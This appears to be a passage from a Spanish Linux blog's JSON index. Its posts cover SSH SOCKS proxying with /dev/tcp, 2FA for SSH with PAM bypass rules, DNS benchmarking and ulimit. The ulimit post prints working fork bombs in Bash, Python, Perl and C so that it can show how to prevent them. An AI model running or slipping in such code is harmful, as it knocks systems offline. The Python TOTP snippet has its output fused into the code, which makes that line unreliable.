tenemos:\n$ tsocks ssh otherremotehost Pero ssh también dispone de sus propios métodos. La opción ProxyCommand sirve para conectar a un servidor SSH a través de un proxy:\n$ ssh -o \u0026#34;ProxyCommand /bin/nc.openbsd -x localhost %h %p\u0026#34; user@otherremotethost También podríamos añadir la configuración de ProxyCommand a nuestro archivo ~/.ssh/config:\nHost otherremotehost ProxyCommand ssh remotehost exec nc %h %p Ahora, para conectarnos a otherremotehost se puede hacer de forma directa, sin pasarle ningún parámetro demás a ssh. Ojo, necesitamos tener instalado netcat (nc) en ambos casos.\n$ ssh otherremotehost Con algún que otro truco, también se puede conseguir utilizar ProxyCommand sin utilizar netcat. Se trata de utilizar el fichero especial /dev/tcp:\nProxyCommand ssh remotehost \u0026#39;exec 3\u0026lt;\u0026gt;/dev/tcp/otherremotehost/22; cat \u0026lt; \u0026amp;3 \u0026amp; cat \u0026gt;\u0026amp;3;kill $!\u0026#39; Para comprobar que esta funcionalidad está soportada, deberemos ejecutar lo siguiente en remotehost, lo que nos devolverá la página de inicio de Google:\n$ exec 3\u0026lt;\u0026gt;/dev/tcp/www.google.com/80 $ echo -e \u0026#34;GET / HTTP/1.1\\n\\n\u0026#34;\u0026gt;\u0026amp;3 $ cat \u0026lt; \u0026amp;3 Si queremos estar seguros de que utilizamos bash, podemos poner:\nProxyCommand ssh remotehost \u0026#34;/bin/bash -c \u0026#39;exec 3\u0026lt;\u0026gt;/dev/tcp/otherremotehost/22; cat \u0026lt; \u0026amp;3 \u0026amp; cat \u0026gt;\u0026amp;3;kill $!\u0026#39;\u0026#34; Los ficheros /dev/tcp y /dev/udp no existen, sino que son interpretados por Bash directamente.\n$ strings /bin/bash | grep -iE \u0026#34;tcp|udp\u0026#34; /dev/tcp/_/_ /dev/udp/_/_ Encadenar proxies mediante proxychains Por último, podemos utilizar proxychains para encadenar varios proxies. proxychains acepta proxies SOCKS4, SOCKS4 y HTTP proxies. Los ficheros de configuración que se comprueban, en orden, son:\n./proxychains.conf $HOME/.proxychains/proxychains.conf /etc/proxychains.conf Lo más sencillo es editar el fichero /etc/proxychains.conf. Algunos ejemplos de configuración:\nsocks5 192.168.67.78 1080 lamer secret http 192.168.89.3 8080 justu hidden socks4 192.168.1.49 1080 http 192.168.39.93 8080 En nuestro caso, tendríamos únicamente el proxy SOCKS que hemos creado nosotros:\nsocks5 127.0.0.1 1080 Para ejecutarlo, es similar a tsocks:\n$ proxychains telnet google.com 80 ProxyChains-3.1 (http://proxychains.sf.net) |DNS-request| google.com |S-chain|-\u0026lt;\u0026gt;-127.0.0.1:9050-\u0026lt;\u0026gt;\u0026lt;\u0026gt;-4.2.2.2:53-\u0026lt;\u0026gt;\u0026lt;\u0026gt;-OK |DNS-response| google.com is 209.85.148.106 Trying 209.85.148.106... |S-chain|-\u0026lt;\u0026gt;-127.0.0.1:1080-\u0026lt;\u0026gt;\u0026lt;\u0026gt;-209.85.148.106:80-\u0026lt;\u0026gt;\u0026lt;\u0026gt;-OK Connected to google.com. Escape character is \u0026#39;^]\u0026#39;. ^C \u0026#34;`tsocks` se basa en el concepto de \u0026#34;shared library interceptor\u0026#34;\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/08/12/utilizar-ssh-para-establecer-un-servidor-proxy-socks/","summary":"\u003cp\u003eUn \u003cem\u003eproxy\u003c/em\u003e SOCKS es un servidor que permite el acceso, normalmente, a\ntravés de un cortafuegos. Podemos utilizar SSH para crear un \u003cem\u003eproxy\u003c/em\u003e\nSOCKSv5 en local, de tal manera que si configuramos una aplicación para\nque se conecte a través de este \u003cem\u003eproxy\u003c/em\u003e, todo el tráfico vaya a través\ndel canal seguro creado por SSH, y sea como si la conexión con dicha\naplicación se hiciera en la máquina remota a la cual nos hemos conectado\npor SSH. Además, podemos utilizarlo con varias aplicaciones y diferentes\nprotocolos.\u003c/p\u003e","title":"Utilizar SSH para establecer un servidor proxy SOCKS"},{"content":"En webupd8.org han publicado un script que permite descargar las fuentes para web de Google, o actualizarlas si ya las habíamos descargado.\nGoogle Web Fonts es un proyecto que consiste en crear un repositorio de fuentes tipográficas de calidad, libres y gratuitas, para que cualquiera pueda utilizarlas en sus proyectos web, sin ningún tipo de barrera, mucho menos económica.\nFuente: googlewebfonts.blogspot.com\nEl script instala las fuentes en el directorio /usr/share/fonts/truetype/google-fonts/, por lo que basta eliminar este directorio para borrarlas.\nPara descargar el script e instalar las fuentes, ejecutamos:\n$ wget http://webupd8.googlecode.com/files/install-google-fonts $ chmod +x install-google-fonts $ ./install-google-fonts Éste es el contenido del script:\n# Original author: Michalis Georgiou # Modified by Andrew http://www.webupd8.org sudo apt-get install mercurial _hgroot=\u0026#34;https://googlefontdirectory.googlecode.com/hg/\u0026#34; _hgrepo=\u0026#34;googlefontdirectory\u0026#34; echo \u0026#34;Connecting to Mercurial server....\u0026#34; if [ -d $_hgrepo ] ; then cd $_hgrepo hg pull -u || return 1 echo \u0026#34;The local files have been updated.\u0026#34; cd .. else hg clone $_hgroot $_hgrepo || return 1 fi echo \u0026#34;Mercurial checkout done or server timeout\u0026#34; sudo mkdir -p /usr/share/fonts/truetype/google-fonts/ find $PWD/$_hgrepo/ -name \u0026#34;*.ttf\u0026#34; -exec sudo install -m644 {} /usr/share/fonts/truetype/google-fonts/ \\; || return 1 fc-cache -f \u0026gt; /dev/null echo \u0026#34;done.\u0026#34; El script también crea el directorio googlefontdirectory en el directorio desde el cual lo hayamos lanzado. Ahí se encuentra el respositorio de las fuentes, así la próxima vez que lo ejecutemos se realizará una actualización, en lugar de una descarga completa.\nUna cosa que hace el script y que no he visto comentada en la página del repositorio, es ejecutar el comando fc-cache después de realizar la instalación o actualización de las fuentes.\nfc-cache busca en el directorio de fuentes del sistema, /usr/share/fonts/, y crea diversos archivos caché con información de las fuentes para las aplicaciones que usan fontconfig para el tratamiento de las fuentes. Estos archivos caché se utilizan para acelerar el inicio de la aplicación cuando utilizan la librería fontconfig. fontconfig es una biblioteca de configuración y personalización de tipografías, que no depende del sistema de ventanas X. Está diseñada para localizar tipografías en el sistema y seleccionarlas según los requerimientos especificados por las aplicaciones.\nPara utilizar las fuentes, vamos al menú Sistema \u0026gt; Preferencias \u0026gt; Apariencia \u0026gt; Tipografías.\n","permalink":"http://karpoke.ignaciocano.com/2011/08/07/instalacion-automatica-de-las-fuentes-para-web-de-google/","summary":"\u003cp\u003eEn \u003ca href=\"http://www.webupd8.org\"\u003ewebupd8.org\u003c/a\u003e han publicado un \u003cem\u003escript\u003c/em\u003e que permite \u003ca href=\"http://www.webupd8.org/2011/01/automatically-install-all-google-web.html\"\u003edescargar las\nfuentes para web de Google\u003c/a\u003e, o actualizarlas si ya las habíamos\ndescargado.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.google.com/webfonts#AboutPlace:about\"\u003eGoogle Web Fonts\u003c/a\u003e es un proyecto que consiste en crear un repositorio\nde fuentes tipográficas de calidad, libres y gratuitas, para que\ncualquiera pueda utilizarlas en sus proyectos web, sin ningún tipo de\nbarrera, mucho menos económica.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Google Web Fonts\" loading=\"lazy\" src=\"/images/google-web-fonts-300x199.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://googlewebfonts.blogspot.com/\"\u003egooglewebfonts.blogspot.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eEl \u003cem\u003e\u003ca href=\"http://webupd8.googlecode.com/files/install-google-fonts\"\u003escript\u003c/a\u003e\u003c/em\u003e instala las fuentes en el directorio\n\u003ccode\u003e/usr/share/fonts/truetype/google-fonts/\u003c/code\u003e, por lo que basta eliminar\neste directorio para borrarlas.\u003c/p\u003e","title":"Instalación automática de las fuentes para web de Google"},{"content":"Un sistema de verificación en dos pasos, (Two Factor Authentication o 2FA) consiste en que la autenticación a un servicio se realiza mediante dos piezas de información, una que conocemos y otra que no. La pieza que conocemos es nuestra contraseña, que es susceptible de ser sustraída, mientras que la información que no conocemos es un número de identificación (PIN) aleatorio que cambia cada 30 segundos y que está vinculado con un dispositivo hardware. Esto es lo que se conoce como una contraseña de un solo uso (One Time Password u OTP). De esta forma, aunque alguien nos robe o averigüe nuestra contraseña, a no ser que también tenga acceso al dispositivo que crea los PINs, no podrá acceder al servicio con nuestra cuenta.\nHay que tener en cuenta que, dado que el PIN es de 6 dígitos, si alguien pudiera probar 1000000 (un millón) de contraseñas en 30 segundos encontraría la clave, por lo que es necesario añadir algún mecanismo extra que impida el acceso por fuerza bruta al sistema.\nCuando Google introdujo 2FA en sus aplicaciones, también creó un módulo PAM para GNU/Linux y una aplicación para el móvil que convierte nuestro móvil en el dispositivo generador de PINs.\nActualizado el 18 de marzo de 2015 Como alternativa a la aplicación móvil de Google (código disponible en github), podemos usar FreeOTP, una aplicación también libre para Android e iOS, compatible con HOTP y TOTP, que servirá perfectamente para nuestro propósito.\nFuente: google.com\nAntes de comenzar, es necesario remarcar que este sistema es incompatible con el uso exclusivo de claves para conectarnos por SSH; se debe poder acceder introduciendo usuario y contraseña.\nRequisitos previos Para habilitar 2FA en nuestro servidor, necesitamos descargar, compilar e instalar el módulo PAM en nuestra máquina.\nInstalación Instalamos, previamente, los paquetes necesarios:\n$ sudo aptitude install libpam0g-dev libpam-devperm mercurial Descargamos el módulo PAM:\n$ hg clone https://code.google.com/p/google-authenticator/ Realizando la instalación en una Ubuntu Lucid Lynx (10.04) me aparecía el siguiente error:\nabort: repository [svn]https://zxing.googlecode.com/svn/trunk/ not found! Parece ser que es porque tiene una versión de mercurial un poco vieja.\n$ hg --version Mercurial Distributed SCM (version 1.4.3) Deberemos instalar una versión de mercurial más nueva de la que está en los repositorios de Lucid, o descargar el código en otro sitio y copiarlo. Con la versión de mercurial en Ubuntu Natty Narwhal no tuve problemas:\n$ hg --version Mercurial Distributed SCM (version 1.7.5) Si lo hemos bajado en otra máquina, no hace falta que copiemos el repositorio entero, únicamente el directorio libpam:\nuser@otherhost:~$ scp -r google-authentication/libpam/ user@host:~ Una vez hecho este paso, lo compilamos en la máquina que lo queremos instalar, y lo instalamos:\n$ cd libpam/ $ make Como inciso, comentar que, ya que estaba, también lo iba a instalar en una Ubuntu Natty Narwhal, y me dio el siguiente error:\ngoogle-authenticator.o: In function `displayQRCode\u0026#39;: /home/karpoke/hg-read-only/google-authenticator/libpam/google-authenticator.c:154: undefined reference to `dlopen\u0026#39; /home/karpoke/hg-read-only/google-authenticator/libpam/google-authenticator.c:166: undefined reference to `dlsym\u0026#39; /home/karpoke/hg-read-only/google-authenticator/libpam/google-authenticator.c:168: undefined reference to `dlsym\u0026#39; /home/karpoke/hg-read-only/google-authenticator/libpam/google-authenticator.c:253: undefined reference to `dlclose\u0026#39; /home/karpoke/hg-read-only/google-authenticator/libpam/google-authenticator.c:156: undefined reference to `dlopen\u0026#39; El problema parece ser que el Makefile no encuentra la librería libdl—la busca en /usr/lib/libdl.so—. La solución pasa por buscarla nosotros mismos y modificar dicho fichero:\n$ find /usr/lib -name libdl.so /usr/lib/i386-linux-gnu/libdl.so $ sed -i \u0026#39;s|/usr/lib/libdl.so|/usr/lib/i386-linux-gnu/libdl.so|g\u0026#39; Makefile $ make Lo instalamos, por fin:\n$ sudo make install $ cp pam_google_authenticator.so /lib/security $ cp google-authenticator /usr/local/bin Configurar el servicio de SSH Ahora debemos añadir el módulo recién instalado al final del fichero /etc/pam.d/sshd ^1^:\n# Google 2FA auth required pam_google_authenticator.so Ejecutamos el siguiente comando con cada usuario con el que queremos utilizar el 2FA, lo cual nos creará una clave secreta en el directorio de usuario:\n$ google-authenticator https://www.google.com/chart?chs=200x200\u0026amp;chld=M|0\u0026amp;cht=qr\u0026amp;chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB Your new secret key is: SAEP64T5VZAVWAFB Your verification code is 376046 Your emergency scratch codes are: 67868696 26247332 54815527 54336661 71083816 Do you want me to update your \u0026#34;~/.google_authenticator\u0026#34; file (y/n) y Do you want to disallow multiple uses of the same authentication token? This restricts you to one login about every 30s, but it increases your chances to notice or even prevent man-in-the-middle attacks (y/n) y By default, tokens are good for 30 seconds and in order to compensate for possible time-skew between the client and the server, we allow an extra token before and after the current time. If you experience problems with poor time synchronization, you can increase the window from its default size of 1:30min to about 4min. Do you want to do so (y/n) n If the computer that you are logging into isn\u0026#39;t hardened against brute-force login attempts, you can enable rate-limiting for the authentication module. By default, this limits attackers to no more than 3 login attempts every 30s. Do you want to enable rate-limiting (y/n) y Deberemos guardar esos códigos celosamente, ya que si perdemos el móvil, esa será la única manera de poder iniciar sesión de forma remota.\nLo siguiente es abrir en un navegador la URL que nos aparece al principio y nos aparecerá un QRCode. Utilizamos la aplicación Google Authenticator para nuestro móvil y lo escaneamos. Si ya teníamos otro generador, ahora tendremos los dos y los podremos distinguir por el nombre.\nTambién podemos leer el código desde el terminal para ver lo que contiene:\n$ wget -O qrcode.png \u0026#39;https://www.google.com/chart?chs=200x200\u0026amp;chld=M|0\u0026amp;cht=qr\u0026amp;chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB\u0026#39; $ qrdecode qrcode.png otpauth://totp/user@server?secret=SAEP64T5VZAVWAFB Es importante que el servidor tenga instalado un servicio de NTP para actualizar la hora de forma precisa. Si tenemos problemas con esto, deberíamos permitir un tamaño de ventana más abierto, tal como sugería google-authenticator.\nTambién necesitaremos editar el fichero de configuración de ssh, /etc/ssh/sshd_config, para que contenga:\nChallengeResponseAuthentication yes UsePAM yes Si usamos las directivas AllowUsers o AllowGroups debemos acordarnos de incluir a cada usuario.\nReiniciamos el servicio de SSH pero no cerramos la conexión que tenemos abierta, sino que intentaremos conectarnos iniciando otra sesión nueva. El motivo es que si tuviéramos algún problema, nos quedaríamos sin poder acceder a la máquina. Si tenemos las conexiones por SSH compartidas, no bastará con abrir un nuevo terminal, deberemos conectarnos desde otro usuario o en otra máquina.\n$ ssh user@host Password: Verification code: La contraseña es la misma que teníamos y el código de verificación es el que nos aparezca en el móvil.\nListos. Configurar un sistema de verificación en dos pasos para SSH es así de sencillo. Por un lado, gracias a Google y por otro, gracias a tutoriales como el de TechRepublic.\nOmitiendo 2FA Podemos tener diferentes razones para no querer utilizar este tipo de autenticación en algunos casos. Por ejemplo, permitir la conexión desde la propia red o permitir que algunos usuarios no utilicen este sistema.\nOmitiendo 2FA para accesos desde la red interna Si sólo queremos 2FA para accesos remotos, desde fuera de la red local, y preferimos omitirlo en conexiones desde la misma LAN, deberemos hacer lo siguiente. Creamos el fichero /etc/security/access-local.conf y ponemos:\n+ : ALL : 192.168.50.0/24 + : ALL : LOCAL - : ALL : ALL Modificamos el fichero /etc/pam.d/sshd para añadir la siguiente línea justo antes de la que ya habíamos añadido, quedando así:\nauth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf auth required pam_google_authenticator.so Ahora ya podemos reiniciar el servicio SSH, y para las conexiones locales o desde la red 192.168.50.0/24 bastará con proporcionar la contraseña.\nOmitiendo 2FA para un usuario concreto Para evitar que determinados usuarios usen este sistema de autenticación, podemos incluir una línea como la siguiente, al principio del fichero /etc/security/access-local.conf, quedando así:\n+ : username : ALL + : ALL : 192.168.50.0/24 + : ALL : LOCAL - : ALL : ALL Deberemos reiniciar el servicio SSH para que los cambios tengan efecto.\nOmitiendo 2FA para un grupo concreto En lugar de ir añadiendo usuarios al fichero /etc/security/access-local.conf, podemos incluir una nueva regla al fichero /etc/pam.d/sshd, justo antes de los cambios que habíamos acabado de añadir en este fichero, quedando así:\nauth sufficient pam_succeed_if.so user ingroup nonotp auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf auth required pam_google_authenticator.so Los usuarios que pertenezcan al grupo nonotp no utilizarán este tipo de autenticación.\nDeberemos reiniciar el servicio SSH para que los cambios tengan efecto.\npam_succeed_if.so pam_succeed_if.so se emplea para provocar que la autenticación falle o sea exitosa en función de algunas características del usuario que está siendo autenticado. Se pueden realizar comprobaciones con los campos: user, uid, gid, shell, home y service. También se puede comprobar la pertenencia, o no, de un usuario a un grupo.\nActualizado el 7 de abril de 2012 La clave de un solo uso que se genera en un momento dado depende únicamente de la clave secreta inicial del usuario y del instante en que se genera dicha clave de un sólo uso. Google Authenticator se basa en el RFC 4226 (Time based One Time Password) para generar una semilla inicial de 16 dígitos en base 32 (RFC 4648). En la página anterior se enlaza a una clase en PHP creada por el autor que muestra como se puede crear la clave para un momento dado y comprobar si una clave dada es correcta permitiendo un pequeño desfase entre los relojes de referencia.\nEn este enlace se muestra una implementación en Python, cuyo código se puede descargar de GitHub.\nEl proceso de obtención de una clave es el siguiente:\nconvertir la cadena con la clave a binario convertir la cadena con el time stamp asociado al intervalo a binario calcular el hash HMAC del time stamp (la parte entera tras divirlo entre el tiempo del intervalo, 30 segundos) usando la clave. Nos devolverá un _hash_ SHA1 de 20 bytes en el último byte del hash devuelto se especifica el offset a partir del cual se encuentra la contraseña OTP obtenemos los bytes donde se encuentra la contraseña y los convertimos a un entero módulo 1000000 En Python:\ndef get_hotp_token(secret, intervals_no): key = base64.b32decode(secret) msg = struct.pack(\u0026#34;\u0026gt;Q\u0026#34;, intervals_no) h = hmac.new(key, msg, hashlib.sha1).digest() o = ord(h[19]) \u0026amp; 15 h = (struct.unpack(\u0026#34;\u0026gt;I\u0026#34;, h[o:o+4])[0] \u0026amp; 0x7fffffff) % 1000000492246 return h def get_totp_token(secret): return get_hotp_token(secret, intervals_no=int(time.time())//30) print get_totp_token(\u0026#39;SAEP64T5VZAVWAFB\u0026#39;) 492246 Un ejemplo de uso del módulo:\n$ git clone https://github.com/tadeck/onetimepass $ ipython In [1]: import onetimepass as otp In [2]: my_secret = \u0026#39;SAEP64T5VZAVWAFB\u0026#39; In [3]: otp.get_totp(my_secret) Out[3]: 453001 In [4]: otp.valid_totp(453001, my_secret) Out[4]: True Actualizado el 1 de marzo de 2015 Desde Ubuntu Precise Pangolin 12.04, el paquete libpam-google-authenticator ya se encuentra en los repositorios.\n1 Incluso podríamos hacer lo mismo para /etc/pam.d/gdm y utilizar 2FA para iniciar sesión en Gnome.\n","permalink":"http://karpoke.ignaciocano.com/2011/08/05/servicio-de-ssh-con-sistema-de-verificacion-en-dos-pasos-de-google-en-ubuntu-natty-narwhal/","summary":"\u003cp\u003eUn sistema de verificación en dos pasos, (\u003cem\u003eTwo Factor Authentication\u003c/em\u003e o\n2FA) consiste en que la autenticación a un servicio se realiza mediante\ndos piezas de información, una que conocemos y otra que no. La pieza que\nconocemos es nuestra contraseña, que es susceptible de ser sustraída,\nmientras que la información que no conocemos es un número de\nidentificación (PIN) aleatorio que cambia cada 30 segundos y que está\nvinculado con un dispositivo hardware. Esto es lo que se conoce como una\ncontraseña de un solo uso (One Time Password u OTP). De esta forma,\naunque alguien nos robe o averigüe nuestra contraseña, a no ser que\ntambién tenga acceso al dispositivo que crea los PINs, no podrá acceder\nal servicio con nuestra cuenta.\u003c/p\u003e","title":"Servicio de SSH con sistema de verificación en dos pasos de Google en Ubuntu Natty Narwhal"},{"content":"$ sudo passwd [sudo] password for user: Are you on drugs? [sudo] password for user: Maybe if you used more than just two fingers... [sudo] password for user: I’ve seen penguins that can type better than that. sudo: 3 incorrect password attempts Si te gustaría recibir un piropo cada vez que escribes mal la contraseña de sudo, no tienes más que editar el archivo de configuración de sudo, /etc/sudoers, mediante el comando visudo:\n$ sudo visudo Y añadir la opción insults:\nDefaults env_reset,insults ","permalink":"http://karpoke.ignaciocano.com/2011/08/04/sudo-vacilon/","summary":"\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo passwd\n[sudo] password for user:\nAre you on drugs?\n[sudo] password for user:\nMaybe if you used more than just two fingers...\n[sudo] password for user:\nI’ve seen penguins that can type better than that.\nsudo: 3 incorrect password attempts\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi te gustaría recibir un piropo cada vez que \u003ca href=\"http://usemoslinux.blogspot.com/2011/08/sudo-no-me-insultes-el-terminal-se.html\"\u003eescribes mal la\ncontraseña de \u003ccode\u003esudo\u003c/code\u003e\u003c/a\u003e, no\ntienes más que editar el archivo de configuración de \u003ca href=\"/posts/memo/with-great-power-comes-great-responsibility/\"\u003e\u003ccode\u003esudo\u003c/code\u003e\u003c/a\u003e,\n\u003ccode\u003e/etc/sudoers\u003c/code\u003e, mediante el comando \u003ccode\u003evisudo\u003c/code\u003e:\u003c/p\u003e","title":"sudo vacilón"},{"content":"Mediante namebench se puede comprobar la velocidad de nuestros DNSs y compararla con los servidores DNS de Google y los mejores servidores DNS que pueda encontrar para nuestra localización. Para realizar las pruebas, se utiliza un listado compuesto por los dominios más visitados según el ranking de Alexa y las páginas visitadas que se encuentren en el historial de nuestro navegador, incluyendo a Firefox o Chromium. Tiene la opción de poder utilizarse desde el terminal.\nLo descargarmos, instalamos y ejecutamos, en este caso, en un entorno gráfico:\n$ wget https://namebench.googlecode.com/files/namebench-1.3.1-source.tgz $ tar xvzf namebench-1.3.1-source.tgz $ namebench-1.3.1/namebench.py Para ejecutarlo desde el terminal, debemos pasarle el argumento -x. Además, vamos a utilizar el listado de servidores DNS de la página adslayuda.com:\n$ namebench-1.3.1/namebench.py -x $(w3m -dump http://www.adslayuda.com/dns.html | grep -Eo \u0026#39;([0-9]{1,3}\\.){3}[0-9]\u0026#39; | sort -t. -nk1 -nk2 -nk3 -nk4 | tr \u0026#39;\\n\u0026#39; \u0026#39; \u0026#39;) Esta es la lista final con la que se realizará el benchmarking:\nFinal list of nameservers considered: ------------------------------------------------------------------------------ 192.168.5.1 Internal 192-5-1 39 ms | twitter.com appears incorrect: 199.59.149.198, static.ak.fbcdn.net appears incorrect: 62.208.24.72 62.151.2.8 Ya.com ES 60 ms | twitter.com appears incorrect: 199.59.148.10, 199.59.149.198, 199.59.149.230, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 212.36.64.16 ADAM ES 61 ms | twitter.com appears incorrect: 199.59.148.10, 199.59.149.198, 199.59.149.230, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 213.172.33.35 NeoSky-2 ES 63 ms | twitter.com appears incorrect: 199.59.149.230, 199.59.149.198, 199.59.148.82, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 80.58.0.33 SYS-80.58.0.33 64 ms | www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34, twitter.com appears incorrect: 199.59.149.198, 199.59.148.10, 199.59.149.230 8.8.4.4 Google Public DNS- 68 ms | Replica of Google Public DNS [8.8.8.8], www.facebook.com appears incorrect: 69.171.228.11, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34, twitter.com appears incorrect: 199.59.149.198, 199.59.148.82, 199.59.149.230 208.67.222.222 OpenDNS-2 71 ms | twitter.com appears incorrect: 199.59.149.230, 199.59.149.198, 199.59.148.82, www.facebook.com appears incorrect: 69.171.229.16, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 156.154.70.1 UltraDNS 80 ms | twitter.com appears incorrect: 199.59.149.198, 199.59.148.10, 199.59.148.82, NXDOMAIN Hijacking, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 216.146.36.36 DynGuide-2 90 ms | www.facebook.com appears incorrect: 69.171.242.13, NXDOMAIN Hijacking, twitter.com appears incorrect: 199.59.149.230, 199.59.148.82, 199.59.148.10, www.paypal.com is hijacked: 173.0.88.34, 173.0.84.2, 173.0.84.34, 173.0.88.2 195.5.64.2 landsraad ES 96 ms | twitter.com appears incorrect: 199.59.149.230, 199.59.148.82, 199.59.149.198, www.paypal.com is hijacked: 173.0.84.2, 173.0.84.34, 173.0.88.2, 173.0.88.34 195.5.64.6 195.5.64.6 98 ms | twitter.com appears incorrect: 199.59.148.82, 199.59.149.198, 199.59.149.230, www.paypal.com is hijacked: 173.0.88.2, 173.0.88.34, 173.0.84.2, 173.0.84.34 El tiempo de respuesta más rápido:\nFastest individual response (in milliseconds): ---------------------------------------------- Internal 192-5-1 ## 1.75309 Adam-2 ES ############################# 44.50703 landsraad ES ################################### 53.90787 Telefonica Movis #################################### 55.42493 Ya.com ES ##################################### 56.76293 SYS-80.58.0.33 ##################################### 56.80299 195.5.64.6 ########################################## 64.96215 Google Public DN ############################################ 67.76404 UltraDNS ############################################## 70.23096 OpenDNS-2 ############################################## 70.60385 DynGuide-2 ##################################################### 82.16095 El tiempo medio de respuesta:\nMean response (in milliseconds): -------------------------------- Internal 192-5-1 ############### 59.90 Ya.com ES ###################### 91.22 Google Public DN ######################### 102.36 UltraDNS ############################## 122.45 DynGuide-2 ################################ 131.89 OpenDNS-2 ################################ 133.27 SYS-80.58.0.33 ###################################### 155.00 Adam-2 ES ###################################### 157.71 Telefonica Movis ####################################### 159.40 landsraad ES ######################################## 164.57 195.5.64.6 ###################################################### 221.42 Este el gráfico mostrado utilizando la API de Google:\nRecomendación final:\nRecommended configuration (fastest + nearest): ---------------------------------------------- nameserver 192.168.5.1 # Internal 192-5-1 nameserver 212.36.64.17 # Adam-2 ES nameserver 212.73.32.3 # Vodafone/Airtel ES ","permalink":"http://karpoke.ignaciocano.com/2011/08/01/namebench-benchmarking-de-servidores-dns/","summary":"\u003cp\u003eMediante \u003ca href=\"http://code.google.com/p/namebench/\"\u003e\u003ccode\u003enamebench\u003c/code\u003e\u003c/a\u003e se puede comprobar la velocidad de nuestros\nDNSs y compararla con los servidores DNS de Google y los mejores\nservidores DNS que pueda encontrar para nuestra localización. Para\nrealizar las pruebas, se utiliza un listado compuesto por los dominios\nmás visitados según el ranking de Alexa y las páginas visitadas que se\nencuentren en el historial de nuestro navegador, incluyendo a Firefox o\nChromium. Tiene la opción de poder \u003ca href=\"http://code.google.com/p/namebench/wiki/UsingNameBenchCommandLine\"\u003eutilizarse desde el terminal\u003c/a\u003e.\u003c/p\u003e","title":"namebench, benchmarking de servidores DNS"},{"content":"Mediante el comando ulimit podemos consultar y controlar el valor de los recursos disponibles para la consola y los procesos que puedan ser iniciados desde ella.\nLas diferentes opciones que acepta este comando son:\n-a All current limits are reported -b The maximum socket buffer size -c The maximum size of core files created -d The maximum size of a process’s data segment -e The maximum scheduling priority (\u0026#34;nice\u0026#34;) -f The maximum size of files written by the shell and its children -i The maximum number of pending signals -l The maximum size that may be locked into memory -m The maximum resident set size (many systems do not honor this limit) -n The maximum number of open file descriptors (most systems do not allow this value to be set) -p The pipe size in 512-byte blocks (this may not be set) -q The maximum number of bytes in POSIX message queues -r The maximum real-time scheduling priority -s The maximum stack size -t The maximum amount of cpu time in seconds -u The maximum number of processes available to a single user -v The maximum amount of virtual memory available to the shell and, on some systems, to its children -x The maximum number of file locks -T The maximum number of threads Para consultar todos los valores asignados actualmente:\n$ ulimit -a core file size (blocks, -c) 0 data seg size (kbytes, -d) unlimited scheduling priority (-e) 20 file size (blocks, -f) unlimited pending signals (-i) 16382 max locked memory (kbytes, -l) 64 max memory size (kbytes, -m) unlimited open files (-n) 1024 pipe size (512 bytes, -p) 8 POSIX message queues (bytes, -q) 819200 real-time priority (-r) 0 stack size (kbytes, -s) 8192 cpu time (seconds, -t) unlimited max user processes (-u) unlimited virtual memory (kbytes, -v) unlimited file locks (-x) unlimited Denegación de servicio Uno de los problemas que podemos encontrar es que el número máximo de procesos no está limitado, por defecto, en algunas distribuciones, entre ellas Ubuntu. Esto hace el equipo vulnerable a un ataque de denegación de servicio (DoS), como por ejemplo una [bomba fork_][bombafork], y a aplicaciones que no están bien programadas o no funcionan correctamente.\nLa vulnerabilidad consiste en que un proceso comienza a crear una gran cantidad de procesos, que consumen tiempo de proceso y memoria, y que saturan la lista de procesos a ejecutar mantenida por el sistema operativo, impidiendo que se ejecuten nuevos programas hasta que no se cierre alguno, provocando que la máquina deje de responder. Un solo usuario podría dejar el sistema sin respuesta.\nFuente: Wikipedia\nEn sencillo obtener un programa de este tipo. Algunos ejemplos típicos de bombas fork, en Bash:\n$ :(){ :|:\u0026amp; };: # \u0026#34;:\u0026#34; es el nombre de la función En Python:\nimport os while True: os.fork() En Perl:\nfork while fork En C:\n#include int main() { while(1) fork(); } Prevención Dado que una vez iniciada la bomba fork es prácticamente imposible crear procesos nuevos y para eliminar los procesos creados por la propia bomba fork se necesita a su vez otra proceso que lo haga, la única solución pasa por el reinicio de la máquina.\nSin embargo, podemos prevenir que un ataque de este tipo se apodere de los recursos de la máquina, limitando el número máximo de procesos que se puedan ejecutar por usuario.\nPodemos especificar un limite para la sesión acutal:\n$ ulimit -u 240 Si ahora lanzamos la bomba fork:\n$ :(){ :|:\u0026amp; };: bash: fork: Recurso no disponible temporalmente ... Podremos eliminar el proceso pulsando Ctrl+C.\nPara que los cambios tengan efecto permanente, editamos el fichero /etc/security/limits.conf y añadimos la siguiente línea:\nusername hard nproc 240 En el próximo reinicio, o si cerramos todas las sesiones y volvemos a entrar, los cambios tendrán efecto.\n","permalink":"http://karpoke.ignaciocano.com/2011/08/01/limitando-el-numero-de-procesos-por-usuario/","summary":"\u003cp\u003eMediante el comando \u003ccode\u003eulimit\u003c/code\u003e podemos consultar y controlar el valor de los\nrecursos disponibles para la consola y los \u003ca href=\"/2010/12/16/mejora-del-rendimiento-interactivo-agrupando-tareas-por-terminal/\"\u003eprocesos que puedan ser iniciados\ndesde ella\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eLas diferentes opciones que acepta este comando son:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e-a     All current limits are 